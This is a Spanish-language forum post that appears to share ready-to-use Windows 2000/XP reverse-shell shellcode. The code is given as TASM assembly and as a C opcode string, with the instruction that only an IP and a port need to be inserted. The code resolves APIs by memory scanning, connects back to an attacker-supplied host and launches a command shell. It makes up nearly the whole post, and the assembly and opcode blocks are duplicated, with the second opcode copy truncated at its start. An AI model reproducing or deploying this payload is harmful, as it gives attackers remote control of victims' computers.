Autor
La scode original es de Brett moore pero tiene bastantes modificaciones para hacerla compatible con 2k/XP ademas de no necesitar offsets (hace escaneos de memoria para encontrar las APIs).
Lo unico que hay que hacer es meterle la IP y el puerto
bmoore.asm
Código:
;*********************************** Christmas Shells***************************************
; Callback Shell.
; Directly set std handles and call system()
;
; 220 (DCh) bytes
;
; its not code, its antic0de
; and it works now too %-)
; Left it in tasm format.
; tasm32 -ml /m5 bmoore.asm
; tlink32 -Tpe -c -x bmoore.obj ,,, import32
;
;*********************************** Christmas Shells***************************************
; Jimminy jellicas its been jimplemented.
; Oddity,Dsp,Shammah,Santa Claus and the rest of the loco locals
; All the o/s peeps who know whats what.
;*******************************************************************************
*************
;//bmoore
;
; Tested working on Win2k SP4 Server,Pro and WinXP SP1a Pro Eng.
;//class101
.586p
locals
.model flat, stdcall
extrn ExitProcess:PROC
extrn WSAStartup:PROC
extrn WSACleanup:PROC
.data
wsadescription_len equ 256
wsasys_status_len equ 128
WSAdata struct
wVersion dw ?
wHighVersion dw ?
szDescription db wsadescription_len+1 dup (?)
szSystemStatus db wsasys_status_len+1 dup (?)
iMaxSockets dw ?
iMaxUdpDg dw ?
lpVendorInfo dw ?
WSAdata ends
wsadata WSAdata <?>
.code
;****************************************************************************
; Winsock + copy to stack code
;****************************************************************************
start:
push offset wsadata
push 0101h
call WSAStartup
or eax, eax
jz winsock_found
jmp codeend
winsock_found:
mov ebx,offset realstart
sub esp,400h
mov eax,esp
Copyit:
mov cl,byte ptr [ebx]
mov byte ptr [eax],cl
inc eax
inc ebx
cmp ebx,offset codeend
jle Copyit
jmp esp
;****************************************************************************
; This is the start of the shell code
;****************************************************************************
realstart:
jmp over_data
sockdat db 02h,01h,00h,065h
db 07fh,00h,00h,01h
hashes db 01h
dw 364Ah
db "MSVCRT",01
dw 422Ah
dw 8AD4h
db "WS2_32",01
dw 817Ch
dw 4E2Ch
over_data:
push 0ACC3575Fh
call esp
mov esi,7ffdf00ch
lodsd
push dword ptr [esi]
mov esi,[eax + 1ch]
lodsd
mov edx,[eax + 08h]
push -8
lea ebx,[edi-8]
LookupFunctions:
push esp
pop ebp
mov ecx,dword ptr [edx + 3ch]
mov esi,dword ptr [ecx + edx + 78h]
lea esi,dword ptr [esi + edx + 1ch]
mov cl,3
StoreAddress:
lodsd
add eax,edx
push eax
loop short StoreAddress
SearchStart:
dec ebx
mov esi,dword ptr [ebp - 8]
xor eax,eax
push eax
Search:
push eax
lodsd
add eax,edx
xor ecx,ecx
hashy:
add cx,word ptr [eax]
add cl,byte ptr [eax]
inc eax
cmp byte ptr [eax],01
jge hashy
pop eax
inc eax
cmp cx,[ebx]
jne Search
pop esi
xchg esi,eax
dec esi
shl esi,1
add esi,dword ptr [ebp - 0ch]
lodsw
shl eax,2
add eax,dword ptr [ebp - 4h]
xchg esi,eax
lodsd
add eax,edx
stosd
dec ebx
cmp byte ptr [ebx],01h
jne short SearchStart
leave
dec byte ptr [ebx]
sub ebx,06h
;//bmoore
cmp byte ptr [ebx-1],01h
je short Done_Finding
;//class101
push ebx
call dword ptr [edi + ebp]
xchg edx,eax
push -16
dec ebx
jne short LookupFunctions
;//bmoore
nop
nop
nop
nop
nop
nop
;//class101
Done_Finding:
xchg eax,ebp
call [EDI - 10h]
xor ecx,ecx
push ecx
push ecx
push ecx
push ecx
inc ecx
push ecx
inc ecx
push ecx
call [EDI - 08h]
xchg ecx,edi
pop edi
add edi,18h
stosd
stosd
stosd
dec ebx
dec byte ptr [ebx]
dec ebx
push ebx
push ebx
push eax
call [ecx - 0ch]
mov eax,1656E64h
sub eax,01010101h
push eax
push esp
call ebp
nop
call WSACleanup
codeend:
end start
;//bmoore
---------EOF
; Callback Shell.
; Directly set std handles and call system()
;
; 220 (DCh) bytes
;
; its not code, its antic0de
; and it works now too %-)
; Left it in tasm format.
; tasm32 -ml /m5 bmoore.asm
; tlink32 -Tpe -c -x bmoore.obj ,,, import32
;
;*********************************** Christmas Shells***************************************
; Jimminy jellicas its been jimplemented.
; Oddity,Dsp,Shammah,Santa Claus and the rest of the loco locals
; All the o/s peeps who know whats what.
;*******************************************************************************
*************
;//bmoore
;
; Tested working on Win2k SP4 Server,Pro and WinXP SP1a Pro Eng.
;//class101
.586p
locals
.model flat, stdcall
extrn ExitProcess:PROC
extrn WSAStartup:PROC
extrn WSACleanup:PROC
.data
wsadescription_len equ 256
wsasys_status_len equ 128
WSAdata struct
wVersion dw ?
wHighVersion dw ?
szDescription db wsadescription_len+1 dup (?)
szSystemStatus db wsasys_status_len+1 dup (?)
iMaxSockets dw ?
iMaxUdpDg dw ?
lpVendorInfo dw ?
WSAdata ends
wsadata WSAdata <?>
.code
;****************************************************************************
; Winsock + copy to stack code
;****************************************************************************
start:
push offset wsadata
push 0101h
call WSAStartup
or eax, eax
jz winsock_found
jmp codeend
winsock_found:
mov ebx,offset realstart
sub esp,400h
mov eax,esp
Copyit:
mov cl,byte ptr [ebx]
mov byte ptr [eax],cl
inc eax
inc ebx
cmp ebx,offset codeend
jle Copyit
jmp esp
;****************************************************************************
; This is the start of the shell code
;****************************************************************************
realstart:
jmp over_data
sockdat db 02h,01h,00h,065h
db 07fh,00h,00h,01h
hashes db 01h
dw 364Ah
db "MSVCRT",01
dw 422Ah
dw 8AD4h
db "WS2_32",01
dw 817Ch
dw 4E2Ch
over_data:
push 0ACC3575Fh
call esp
mov esi,7ffdf00ch
lodsd
push dword ptr [esi]
mov esi,[eax + 1ch]
lodsd
mov edx,[eax + 08h]
push -8
lea ebx,[edi-8]
LookupFunctions:
push esp
pop ebp
mov ecx,dword ptr [edx + 3ch]
mov esi,dword ptr [ecx + edx + 78h]
lea esi,dword ptr [esi + edx + 1ch]
mov cl,3
StoreAddress:
lodsd
add eax,edx
push eax
loop short StoreAddress
SearchStart:
dec ebx
mov esi,dword ptr [ebp - 8]
xor eax,eax
push eax
Search:
push eax
lodsd
add eax,edx
xor ecx,ecx
hashy:
add cx,word ptr [eax]
add cl,byte ptr [eax]
inc eax
cmp byte ptr [eax],01
jge hashy
pop eax
inc eax
cmp cx,[ebx]
jne Search
pop esi
xchg esi,eax
dec esi
shl esi,1
add esi,dword ptr [ebp - 0ch]
lodsw
shl eax,2
add eax,dword ptr [ebp - 4h]
xchg esi,eax
lodsd
add eax,edx
stosd
dec ebx
cmp byte ptr [ebx],01h
jne short SearchStart
leave
dec byte ptr [ebx]
sub ebx,06h
;//bmoore
cmp byte ptr [ebx-1],01h
je short Done_Finding
;//class101
push ebx
call dword ptr [edi + ebp]
xchg edx,eax
push -16
dec ebx
jne short LookupFunctions
;//bmoore
nop
nop
nop
nop
nop
nop
;//class101
Done_Finding:
xchg eax,ebp
call [EDI - 10h]
xor ecx,ecx
push ecx
push ecx
push ecx
push ecx
inc ecx
push ecx
inc ecx
push ecx
call [EDI - 08h]
xchg ecx,edi
pop edi
add edi,18h
stosd
stosd
stosd
dec ebx
dec byte ptr [ebx]
dec ebx
push ebx
push ebx
push eax
call [ecx - 0ch]
mov eax,1656E64h
sub eax,01010101h
push eax
push esp
call ebp
nop
call WSACleanup
codeend:
end start
;//bmoore
---------EOF
Y ahora, los Opcodes en C:
char scode[] =
Código:
"\xEB\x21\x02\x01"
"\x00\x00" //port
"\x00\x00\x00\x00" //ip
"\x01\x4A\x36\x4D\x53\x56"
"\x43\x52\x54\x01\x2A\x42\xD4\x8A\x57\x53\x32\x5F\x33\x32\x01\x7C"
"\x81\x2C\x4E\x68\x5F\x57\xC3\xAC\xFF\xD4\xBE\x0C\xF0\xFD\x7F\xAD"
"\xFF\x36\x8B\x70\x1C\xAD\x8B\x50\x08\x6A\xF8\x8D\x5F\xF8\x54\x5D"
"\x8B\x4A\x3C\x8B\x74\x11\x78\x8D\x74\x16\x1C\xB1\x03\xAD\x03\xC2"
"\x50\xE2\xFA\x4B\x8B\x75\xF8\x33\xC0\x50\x50\xAD\x03\xC2\x33\xC9"
"\x66\x03\x08\x02\x08\x40\x80\x38\x01\x7D\xF5\x58\x40\x66\x3B\x0B"
"\x75\xE8\x5E\x96\x4E\xD1\xE6\x03\x75\xF4\x66\xAD\xC1\xE0\x02\x03"
"\x45\xFC\x96\xAD\x03\xC2\xAB\x4B\x80\x3B\x01\x75\xC6\xC9\xFE\x0B"
"\x83\xEB\x06\x80\x7B\xFF\x01\x74\x10\x53\xFF\x14\x2F\x92\x6A\xF0"
"\x4B\x75\x9B\x90\x90\x90\x90\x90\x90\x95\xFF\x57\xF0\x33\xC9\x51"
"\x51\x51\x51\x41\x51\x41\x51\xFF\x57\xF8\x87\xCF\x5F\x83\xC7\x18"
"\xAB\xAB\xAB\x4B\xFE\x0B\x4B\x53\x53\x50\xFF\x51\xF4\xB8\x64\x6E"
"\x65\x01\x2D\x01\x01\x01\x01\x50\x54\xFF\xD5\x90";
"\x00\x00" //port
"\x00\x00\x00\x00" //ip
"\x01\x4A\x36\x4D\x53\x56"
"\x43\x52\x54\x01\x2A\x42\xD4\x8A\x57\x53\x32\x5F\x33\x32\x01\x7C"
"\x81\x2C\x4E\x68\x5F\x57\xC3\xAC\xFF\xD4\xBE\x0C\xF0\xFD\x7F\xAD"
"\xFF\x36\x8B\x70\x1C\xAD\x8B\x50\x08\x6A\xF8\x8D\x5F\xF8\x54\x5D"
"\x8B\x4A\x3C\x8B\x74\x11\x78\x8D\x74\x16\x1C\xB1\x03\xAD\x03\xC2"
"\x50\xE2\xFA\x4B\x8B\x75\xF8\x33\xC0\x50\x50\xAD\x03\xC2\x33\xC9"
"\x66\x03\x08\x02\x08\x40\x80\x38\x01\x7D\xF5\x58\x40\x66\x3B\x0B"
"\x75\xE8\x5E\x96\x4E\xD1\xE6\x03\x75\xF4\x66\xAD\xC1\xE0\x02\x03"
"\x45\xFC\x96\xAD\x03\xC2\xAB\x4B\x80\x3B\x01\x75\xC6\xC9\xFE\x0B"
"\x83\xEB\x06\x80\x7B\xFF\x01\x74\x10\x53\xFF\x14\x2F\x92\x6A\xF0"
"\x4B\x75\x9B\x90\x90\x90\x90\x90\x90\x95\xFF\x57\xF0\x33\xC9\x51"
"\x51\x51\x51\x41\x51\x41\x51\xFF\x57\xF8\x87\xCF\x5F\x83\xC7\x18"
"\xAB\xAB\xAB\x4B\xFE\x0B\x4B\x53\x53\x50\xFF\x51\xF4\xB8\x64\x6E"
"\x65\x01\x2D\x01\x01\x01\x01\x50\x54\xFF\xD5\x90";
Salu2
En línea
